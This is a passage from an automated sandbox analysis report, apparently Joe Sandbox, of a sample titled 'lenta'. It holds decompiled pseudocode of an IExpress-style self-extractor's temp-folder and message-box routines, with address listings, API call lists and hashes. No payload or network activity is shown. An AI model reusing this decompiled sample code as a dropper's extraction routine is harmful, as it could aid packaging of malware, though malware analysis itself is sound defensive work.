                                                                                                                                                                                                                                            												goto L19;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t101 = 1;
                                                                                                                                                                                                                                            												_t82 = 0x8d91e4;
                                                                                                                                                                                                                                            												_t71 = E008D5467(0x8d91e4, 1, 1);
                                                                                                                                                                                                                                            												__eflags = _t71;
                                                                                                                                                                                                                                            												if(_t71 != 0) {
                                                                                                                                                                                                                                            													goto L45;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													do {
                                                                                                                                                                                                                                            														goto L19;
                                                                                                                                                                                                                                            														L43:
                                                                                                                                                                                                                                            														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            														_push(4);
                                                                                                                                                                                                                                            														_t101 = 3;
                                                                                                                                                                                                                                            														_t82 =  &_v268;
                                                                                                                                                                                                                                            														_t44 = E008D597D(_t82, _t101, 1);
                                                                                                                                                                                                                                            														__eflags = _t44;
                                                                                                                                                                                                                                            													} while (_t44 != 0);
                                                                                                                                                                                                                                            													goto L2;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                            							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								_t72 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0x8d8b3f - _t35; // 0x0
                                                                                                                                                                                                                                            								_t72 = 0;
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L10;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t101 = 0;
                                                                                                                                                                                                                                            							_t73 = E008D5467(0x8d8b3e, 0, _t72);
                                                                                                                                                                                                                                            							__eflags = _t73;
                                                                                                                                                                                                                                            							if(_t73 != 0) {
                                                                                                                                                                                                                                            								L45:
                                                                                                                                                                                                                                            								_t38 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t101 = 0x4be;
                                                                                                                                                                                                                                            								E008D44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L2;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t101 = 0x4b1;
                                                                                                                                                                                                                                            						E008D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						 *0x8d9124 = 0x80070714;
                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t101 = 0x4b5;
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					_t38 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L47:
                                                                                                                                                                                                                                            				return E008D6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x008d55ab
                                                                                                                                                                                                                                            0x008d55b2
                                                                                                                                                                                                                                            0x008d55c9
                                                                                                                                                                                                                                            0x008d55d5
                                                                                                                                                                                                                                            0x008d55d9
                                                                                                                                                                                                                                            0x008d5600
                                                                                                                                                                                                                                            0x008d5605
                                                                                                                                                                                                                                            0x008d560a
                                                                                                                                                                                                                                            0x008d560c
                                                                                                                                                                                                                                            0x008d5638
                                                                                                                                                                                                                                            0x008d5641
                                                                                                                                                                                                                                            0x008d5643
                                                                                                                                                                                                                                            0x008d5645
                                                                                                                                                                                                                                            0x008d5645
                                                                                                                                                                                                                                            0x008d564c
                                                                                                                                                                                                                                            0x008d5652
                                                                                                                                                                                                                                            0x008d5657
                                                                                                                                                                                                                                            0x008d5659
                                                                                                                                                                                                                                            0x008d5696
                                                                                                                                                                                                                                            0x008d569c
                                                                                                                                                                                                                                            0x008d589f
                                                                                                                                                                                                                                            0x008d58a7
                                                                                                                                                                                                                                            0x008d58ac
                                                                                                                                                                                                                                            0x008d58b3
                                                                                                                                                                                                                                            0x008d58b5
                                                                                                                                                                                                                                            0x008d56a2
                                                                                                                                                                                                                                            0x008d56a2
                                                                                                                                                                                                                                            0x008d56a8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d56ae
                                                                                                                                                                                                                                            0x008d56ae
                                                                                                                                                                                                                                            0x008d56b9
                                                                                                                                                                                                                                            0x008d56bf
                                                                                                                                                                                                                                            0x008d56c1
                                                                                                                                                                                                                                            0x008d56f3
                                                                                                                                                                                                                                            0x008d56f3
                                                                                                                                                                                                                                            0x008d5705
                                                                                                                                                                                                                                            0x008d570a
                                                                                                                                                                                                                                            0x008d5711
                                                                                                                                                                                                                                            0x008d5717
                                                                                                                                                                                                                                            0x008d5724
                                                                                                                                                                                                                                            0x008d5726
                                                                                                                                                                                                                                            0x008d5729
                                                                                                                                                                                                                                            0x008d5730
                                                                                                                                                                                                                                            0x008d5737
                                                                                                                                                                                                                                            0x008d573d
                                                                                                                                                                                                                                            0x008d5740
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d572b
                                                                                                                                                                                                                                            0x008d572b
                                                                                                                                                                                                                                            0x008d572e
                                                                                                                                                                                                                                            0x008d5742
                                                                                                                                                                                                                                            0x008d5742
                                                                                                                                                                                                                                            0x008d5745
                                                                                                                                                                                                                                            0x008d576b
                                                                                                                                                                                                                                            0x008d576b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5747
                                                                                                                                                                                                                                            0x008d5747
                                                                                                                                                                                                                                            0x008d574d
                                                                                                                                                                                                                                            0x008d574f
                                                                                                                                                                                                                                            0x008d5771
                                                                                                                                                                                                                                            0x008d5771
                                                                                                                                                                                                                                            0x008d5773
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5751
                                                                                                                                                                                                                                            0x008d5751
                                                                                                                                                                                                                                            0x008d5753
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5755
                                                                                                                                                                                                                                            0x008d575b
                                                                                                                                                                                                                                            0x008d5760
                                                                                                                                                                                                                                            0x008d5762
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5764
                                                                                                                                                                                                                                            0x008d5764
                                                                                                                                                                                                                                            0x008d5769
                                                                                                                                                                                                                                            0x008d577e
                                                                                                                                                                                                                                            0x008d577e
                                                                                                                                                                                                                                            0x008d5781
                                                                                                                                                                                                                                            0x008d5788
                                                                                                                                                                                                                                            0x008d578d
                                                                                                                                                                                                                                            0x008d578f
                                                                                                                                                                                                                                            0x008d57b2
                                                                                                                                                                                                                                            0x008d57b8
                                                                                                                                                                                                                                            0x008d57bd
                                                                                                                                                                                                                                            0x008d57bf
                                                                                                                                                                                                                                            0x008d57cd
                                                                                                                                                                                                                                            0x008d57cd
                                                                                                                                                                                                                                            0x008d57dd
                                                                                                                                                                                                                                            0x008d57e3
                                                                                                                                                                                                                                            0x008d57ef
                                                                                                                                                                                                                                            0x008d57f5
                                                                                                                                                                                                                                            0x008d57f8
                                                                                                                                                                                                                                            0x008d580a
                                                                                                                                                                                                                                            0x008d580a
                                                                                                                                                                                                                                            0x008d57fa
                                                                                                                                                                                                                                            0x008d5802
                                                                                                                                                                                                                                            0x008d5802
                                                                                                                                                                                                                                            0x008d580d
                                                                                                                                                                                                                                            0x008d580f
                                                                                                                                                                                                                                            0x008d5830
                                                                                                                                                                                                                                            0x008d5836
                                                                                                                                                                                                                                            0x008d583d
                                                                                                                                                                                                                                            0x008d584b
                                                                                                                                                                                                                                            0x008d5851
                                                                                                                                                                                                                                            0x008d5855
                                                                                                                                                                                                                                            0x008d585a
                                                                                                                                                                                                                                            0x008d585c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d585e
                                                                                                                                                                                                                                            0x008d585e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d585e
                                                                                                                                                                                                                                            0x008d5811
                                                                                                                                                                                                                                            0x008d5817
                                                                                                                                                                                                                                            0x008d5819
                                                                                                                                                                                                                                            0x008d581f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d581f
                                                                                                                                                                                                                                            0x008d5791
                                                                                                                                                                                                                                            0x008d5797
                                                                                                                                                                                                                                            0x008d579c
                                                                                                                                                                                                                                            0x008d579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d57a0
                                                                                                                                                                                                                                            0x008d57a9
                                                                                                                                                                                                                                            0x008d57ae
                                                                                                                                                                                                                                            0x008d57b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d57b0
                                                                                                                                                                                                                                            0x008d579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5769
                                                                                                                                                                                                                                            0x008d5762
                                                                                                                                                                                                                                            0x008d5753
                                                                                                                                                                                                                                            0x008d574f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d572e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5864
                                                                                                                                                                                                                                            0x008d5864
                                                                                                                                                                                                                                            0x008d5864
                                                                                                                                                                                                                                            0x008d5717
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d56c3
                                                                                                                                                                                                                                            0x008d56c5
                                                                                                                                                                                                                                            0x008d56c9
                                                                                                                                                                                                                                            0x008d56ce
                                                                                                                                                                                                                                            0x008d56d0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d56d6
                                                                                                                                                                                                                                            0x008d56d6
                                                                                                                                                                                                                                            0x008d56d8
                                                                                                                                                                                                                                            0x008d56dd
                                                                                                                                                                                                                                            0x008d56df
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d56e1
                                                                                                                                                                                                                                            0x008d56e2
                                                                                                                                                                                                                                            0x008d56e4
                                                                                                                                                                                                                                            0x008d56e6
                                                                                                                                                                                                                                            0x008d56eb
                                                                                                                                                                                                                                            0x008d56ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d56f3
                                                                                                                                                                                                                                            0x008d56f3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d586c
                                                                                                                                                                                                                                            0x008d5878
                                                                                                                                                                                                                                            0x008d587e
                                                                                                                                                                                                                                            0x008d5882
                                                                                                                                                                                                                                            0x008d5883
                                                                                                                                                                                                                                            0x008d5889
                                                                                                                                                                                                                                            0x008d588e
                                                                                                                                                                                                                                            0x008d588e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5896
                                                                                                                                                                                                                                            0x008d56ed
                                                                                                                                                                                                                                            0x008d56df
                                                                                                                                                                                                                                            0x008d56d0
                                                                                                                                                                                                                                            0x008d56c1
                                                                                                                                                                                                                                            0x008d56a8
                                                                                                                                                                                                                                            0x008d565b
                                                                                                                                                                                                                                            0x008d565b
                                                                                                                                                                                                                                            0x008d565d
                                                                                                                                                                                                                                            0x008d5669
                                                                                                                                                                                                                                            0x008d5669
                                                                                                                                                                                                                                            0x008d565f
                                                                                                                                                                                                                                            0x008d565f
                                                                                                                                                                                                                                            0x008d5665
                                                                                                                                                                                                                                            0x008d5667
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5667
                                                                                                                                                                                                                                            0x008d566c
                                                                                                                                                                                                                                            0x008d5673
                                                                                                                                                                                                                                            0x008d5678
                                                                                                                                                                                                                                            0x008d567a
                                                                                                                                                                                                                                            0x008d589b
                                                                                                                                                                                                                                            0x008d589b
                                                                                                                                                                                                                                            0x008d5680
                                                                                                                                                                                                                                            0x008d5685
                                                                                                                                                                                                                                            0x008d568c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d568c
                                                                                                                                                                                                                                            0x008d567a
                                                                                                                                                                                                                                            0x008d560e
                                                                                                                                                                                                                                            0x008d5613
                                                                                                                                                                                                                                            0x008d561a
                                                                                                                                                                                                                                            0x008d5620
                                                                                                                                                                                                                                            0x008d5626
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5626
                                                                                                                                                                                                                                            0x008d55db
                                                                                                                                                                                                                                            0x008d55e0
                                                                                                                                                                                                                                            0x008d55e7
                                                                                                                                                                                                                                            0x008d55f1
                                                                                                                                                                                                                                            0x008d55f6
                                                                                                                                                                                                                                            0x008d55f6
                                                                                                                                                                                                                                            0x008d55f6
                                                                                                                                                                                                                                            0x008d58b7
                                                                                                                                                                                                                                            0x008d58c7

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46A0
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: SizeofResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46A9
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008D46C3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LoadResource.KERNEL32(00000000,00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46CC
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: LockResource.KERNEL32(00000000,?,008D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46D3
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: memcpy_s.MSVCRT ref: 008D46E5
                                                                                                                                                                                                                                              • Part of subcall function 008D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 008D55CF
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 008D5638
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 008D564C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 008D5620
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                              • Part of subcall function 008D6285: GetLastError.KERNEL32(008D5BBC), ref: 008D6285
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008D56B9
                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 008D571E
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 008D5737
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 008D57CD
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 008D57EF
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 008D5802
                                                                                                                                                                                                                                              • Part of subcall function 008D2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 008D2654
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 008D5830
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: FindResourceA.KERNEL32(008D0000,000007D6,00000005), ref: 008D652A
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: LoadResource.KERNEL32(008D0000,00000000,?,?,008D2EE8,00000000,008D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 008D6538
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: DialogBoxIndirectParamA.USER32(008D0000,00000000,00000547,008D19E0,00000000), ref: 008D6557
                                                                                                                                                                                                                                              • Part of subcall function 008D6517: FreeResource.KERNEL32(00000000,?,?,008D2EE8,00000000,008D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 008D6560
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 008D5878
                                                                                                                                                                                                                                              • Part of subcall function 008D597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 008D59A8
                                                                                                                                                                                                                                              • Part of subcall function 008D597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 008D59AF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                            • API String ID: 2436801531-2740620654
                                                                                                                                                                                                                                            • Opcode ID: 7532b87a0490f559487d79f24a5e8dee29dcc080bad4076f5f023ed9db8ae207
                                                                                                                                                                                                                                            • Instruction ID: a019cad84d1f6ec43911c403eaff2eeaf39a1b6e524552691d3bdd6c95b6d238
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7532b87a0490f559487d79f24a5e8dee29dcc080bad4076f5f023ed9db8ae207
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54810770A05A18AADB24AB749C85BEF776DFF60300F1403A7F586D2391EE748DC58A51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 406 8d44b9-8d44f8 407 8d44fe-8d4525 LoadStringA 406->407 408 8d4679-8d467b 406->408 410 8d4527-8d452e call 8d681f 407->410 411 8d4562-8d4568 407->411 409 8d467c-8d468c call 8d6ce0 408->409 418 8d453f 410->418 419 8d4530-8d453d call 8d67c9 410->419 414 8d456b-8d4570 411->414 414->414 417 8d4572-8d457c 414->417 420 8d457e-8d4580 417->420 421 8d45c9-8d45cb 417->421 425 8d4544-8d4554 MessageBoxA 418->425 419->418 419->425 426 8d4583-8d4588 420->426 423 8d45cd-8d45cf 421->423 424 8d4607-8d4617 LocalAlloc 421->424 428 8d45d2-8d45d7 423->428 429 8d455a-8d455d 424->429 430 8d461d-8d4628 call 8d1680 424->430 425->429 426->426 431 8d458a-8d458c 426->431 428->428 432 8d45d9-8d45ed LocalAlloc 428->432 429->409 436 8d462d-8d463d MessageBeep call 8d681f 430->436 434 8d458f-8d4594 431->434 432->429 435 8d45f3-8d4605 call 8d171e 432->435 434->434 437 8d4596-8d45ad LocalAlloc 434->437 435->436 444 8d463f-8d464c call 8d67c9 436->444 445 8d464e 436->445 437->429 438 8d45af-8d45c7 call 8d171e 437->438 438->436 444->445 448 8d4653-8d4677 MessageBoxA LocalFree 444->448 445->448 448->409
                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E008D44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                            				char _v576;
                                                                                                                                                                                                                                            				void* _v580;
                                                                                                                                                                                                                                            				struct HWND__* _v584;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                            				int _t64;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                                                                                                            				_t34 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                            				_v584 = __ecx;
                                                                                                                                                                                                                                            				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                            				_t67 = _a4;
                                                                                                                                                                                                                                            				_t69 = 0xd;
                                                                                                                                                                                                                                            				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                            				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                            				_v580 = _t37;
                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                            				if(( *0x8d8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            					_t39 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_v576 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0x8d9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                            					if(_v576 != 0) {
                                                                                                                                                                                                                                            						_t73 =  &_v576;
                                                                                                                                                                                                                                            						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                            						_t75 = _t16;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t43 =  *_t73;
                                                                                                                                                                                                                                            							_t73 = _t73 + 1;
                                                                                                                                                                                                                                            						} while (_t43 != 0);
                                                                                                                                                                                                                                            						_t84 = _v580;
                                                                                                                                                                                                                                            						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                                            							if(_t67 == 0) {
                                                                                                                                                                                                                                            								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                            								_t83 = _t27;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t75 = _t83;
                                                                                                                                                                                                                                            									_t74 = _t80;
                                                                                                                                                                                                                                            									E008D1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t76 = _t67;
                                                                                                                                                                                                                                            								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                            								_t85 = _t24;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t55 =  *_t76;
                                                                                                                                                                                                                                            									_t76 = _t76 + 1;
                                                                                                                                                                                                                                            								} while (_t55 != 0);
                                                                                                                                                                                                                                            								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                            								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E008D171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t77 = _t67;
                                                                                                                                                                                                                                            							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                            							_t81 = _t18;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t58 =  *_t77;
                                                                                                                                                                                                                                            								_t77 = _t77 + 1;
                                                                                                                                                                                                                                            							} while (_t58 != 0);
                                                                                                                                                                                                                                            							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                            							_t82 = _t84 + 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t59 =  *_t84;
                                                                                                                                                                                                                                            								_t84 = _t84 + 1;
                                                                                                                                                                                                                                            							} while (_t59 != 0);
                                                                                                                                                                                                                                            							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                            							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                            							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                            							_t80 = _t44;
                                                                                                                                                                                                                                            							if(_t80 == 0) {
                                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_push(_v580);
                                                                                                                                                                                                                                            								E008D171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                            								MessageBeep(_a12);
                                                                                                                                                                                                                                            								if(E008D681F(_t67) == 0) {
                                                                                                                                                                                                                                            									L25:
                                                                                                                                                                                                                                            									_t49 = 0x10000;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t54 = E008D67C9(_t74, _t74);
                                                                                                                                                                                                                                            									_t49 = 0x190000;
                                                                                                                                                                                                                                            									if(_t54 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                            								_t83 = _t52;
                                                                                                                                                                                                                                            								LocalFree(_t80);
                                                                                                                                                                                                                                            								_t39 = _t52;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(E008D681F(_t67) == 0) {
                                                                                                                                                                                                                                            							L4:
                                                                                                                                                                                                                                            							_t64 = 0x10010;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t66 = E008D67C9(0, 0);
                                                                                                                                                                                                                                            							_t64 = 0x190010;
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x008d44b9
                                                                                                                                                                                                                                            0x008d44c4
                                                                                                                                                                                                                                            0x008d44cb
                                                                                                                                                                                                                                            0x008d44d8
                                                                                                                                                                                                                                            0x008d44e4
